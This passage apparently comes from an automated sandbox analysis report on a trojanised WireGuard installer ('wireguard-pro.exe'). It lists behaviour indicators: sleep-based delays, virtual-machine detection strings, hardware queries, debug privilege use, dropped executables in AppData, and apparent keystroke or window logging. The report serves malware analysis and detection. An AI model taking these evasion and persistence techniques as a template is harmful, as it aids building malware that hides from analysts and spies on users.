Source: C:\Program Files\WireGuard\wireguard.exe TID: 6572	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5260	Thread sleep count: 6488 > 30
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5260	Thread sleep count: 3233 > 30
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -599546s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -599437s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -599217s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -599105s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -598995s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -598886s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -598774s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -598654s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -598552s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -598417s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -598306s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -598197s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -598087s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -597978s >= -30000s
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe TID: 5404	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7556	Thread sleep time: -60000s >= -30000s

Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\wireguard-pro.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 599541	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 599436	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 599108	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598884	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598784	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598659	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598534	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598407	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598282	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598150	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598040	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 597927	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 599217
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 599105
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598995
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598886
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598774
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598654
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598552
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598417
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598306
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598197
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598087
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 597978

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Window / User API: threadDelayed 3438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Window / User API: threadDelayed 6194	Jump to behavior
Source: C:\Program Files\WireGuard\wireguard.exe	Window / User API: foregroundWindowGot 466
Source: C:\Program Files\WireGuard\wireguard.exe	Window / User API: foregroundWindowGot 408
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Window / User API: threadDelayed 6488
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Window / User API: threadDelayed 3233

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIC8E4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIC9F4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIC944.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIC9E3.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files\WireGuard\wg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\wireguard-pro.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 599541	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 599436	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 599108	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598999	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598884	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598784	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598659	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598534	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598407	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598282	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598150	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 598040	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 597927	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 599217
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 599105
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598995
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598886
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598774
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598654
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598552
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598417
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598306
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598197
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 598087
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 597978
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Thread delayed: delay time: 60000

Source: Amcache.hve.0.dr	Binary or memory string: VMware
Source: Amcache.hve.0.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.0.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000002.1132251769.0000028D9C007000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.769585861.0000028D9C007000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.815452064.000002034A483000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.815507931.000002034A4E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.0.dr	Binary or memory string: VMware, Inc.me
Source: 7ABGVF6Q.exe, 00000002.00000002.636669990.0000000000A80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: Amcache.hve.0.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: HQL82NEF.exe, 00000003.00000002.1129347191.0000000000FFD000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000008.00000002.640500856.00000172B6038000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 0000000A.00000002.1131871415.0000018A097F8000.00000004.00000020.00020000.00000000.sdmp, audddd.exe, 00000011.00000002.821146640.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, audddd.exe, 00000012.00000002.1129439699.00000000014BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wireguard.exe, 00000009.00000002.1132693918.0000028DC1E52000.00000004.00000020.00020000.00000000.sdmp, wireguard.exe, 00000009.00000003.769752037.0000028DC1E51000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW#
Source: wireguard.exe, 00000007.00000002.638405462.000001D1E3F38000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllgg
Source: Amcache.hve.0.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: wireguard.exe, 00000009.00000002.1131825432.0000028D9BF30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`?
Source: wireguard.exe, 00000009.00000002.1132736589.0000028DC1E79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmnetextension
Source: Amcache.hve.0.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
Source: wireguard.exe, 00000009.00000003.639989811.0000028D9C00A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmnetextensionProg8
Source: Amcache.hve.0.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.0.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.0.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.0.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.0.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: 7ABGVF6Q.exe, 00000002.00000003.636569317.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000003.636540344.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, 7ABGVF6Q.exe, 00000002.00000002.636682916.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-USn
Source: Amcache.hve.0.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: wireguard.exe, 00000009.00000003.640004386.0000028D9BFF7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmnetextensionsystem32\drivers\wfplwfs.sys,-6001g
Source: wireguard.exe, 00000009.00000003.639789020.0000028D9BFC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HKR, Ndi\Interfaces,FilterMediaTypes,,"vmnetextension"

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Program Files\WireGuard\wireguard.exe C:\Program Files\WireGuard\wireguard.exe

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Code function: 3_2_06786280 LdrInitializeThunk,

3_2_06786280

Source: C:\Users\user\Desktop\wireguard-pro.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe

Code function: 2_2_00301110 EntryPoint,GetStartupInfoA,Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,_cexit,exit,

2_2_00301110

Source: C:\Users\user\Desktop\wireguard-pro.exe	Process created: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe "C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe"	Jump to behavior
Source: C:\Users\user\Desktop\wireguard-pro.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe "C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe"	Jump to behavior
Source: C:\Program Files\WireGuard\wireguard.exe	Process created: C:\Program Files\WireGuard\wireguard.exe "C:\Program Files\WireGuard\wireguard.exe" /installmanagerservice
Source: C:\Program Files\WireGuard\wireguard.exe	Process created: C:\Program Files\WireGuard\wireguard.exe "C:\Program Files\WireGuard\wireguard.exe" /ui 888 884 896 904

Source: HQL82NEF.exe, 00000003.00000002.1130370284.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: wireguard.exe, 0000000A.00000002.1131050448.000000C00018C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Status: UnknownShell_TrayWndStatus: UnknownShell_TrayWndStatus:Listen port:DNS servers:Scripts:Import tunnel(s) from fileStatus:Listen port:DNS servers:Scripts:Import tunnel(s) from fileStatus:Listen port:DNS servers:Scripts:Import tunnel(s) from fileStatus:Listen port:DNS servers:Scripts:Import tunnel(s) from file
Source: wireguard.exe, 00000007.00000000.635889564.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000008.00000000.636854021.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, wireguard.exe, 00000009.00000000.637554175.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: RegDeleteKeyWRegEnumKeyExWRegEnumValueWRegOpenKeyExWRoundingMode(RtlGetVersionRtlInitStringRtlMoveMemorySelectedCountSetBrushOrgExSetScrollInfoSetWindowLongShellExecuteWShell_TrayWndShutting downStartServiceWStarting%s %sSysFreeStringSysListView32Thread32FirstUnknown stateValueOverflowVirtualUnlockWTSFreeMemoryWireGuard: %sWriteConsoleWbad flushGen bad map statedalTLDpSugct?debugCall2048effect == nilexchange fullfatal error: getTypeInfo: gethostbynamegetservbynameinvalid UTF-8invalid base invalid indexinvalid stylelevel 3 resetload64 failedmin too largenil stackbasenot availableout of memoryparsing time runtime: seq=runtime: val=srmount errortimer expiredtraceStackTabvalue method wglShareListswireguard-%s-wireguard.dllxadd64 failedxchg64 failed}
Source: HQL82NEF.exe, 00000003.00000002.1130370284.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <br><span style=font-size:14px;font-style:normal;text-decoration:none;text-transform:none;color:#0099cc;>[Program Manager]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (10/04/2023 01:46:04)</span></span><br>
Source: wireguard.exe, 0000000A.00000002.1131050448.000000C00018C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Ctrl+ESysListView32SysListView32&CopyCtrl+C&CopyCtrl+CShell_TrayWnd&Import tunnel(s) from file

Source: C:\Users\user\Desktop\wireguard-pro.exe	Queries volume information: C:\Users\user\Desktop\wireguard-pro.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\WireGuard\wireguard.exe	Queries volume information: C:\Program Files\WireGuard\Data VolumeInformation
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Queries volume information: C:\Users\user\AppData\Roaming\audddd\audddd.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Queries volume information: C:\Users\user\AppData\Roaming\audddd\audddd.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
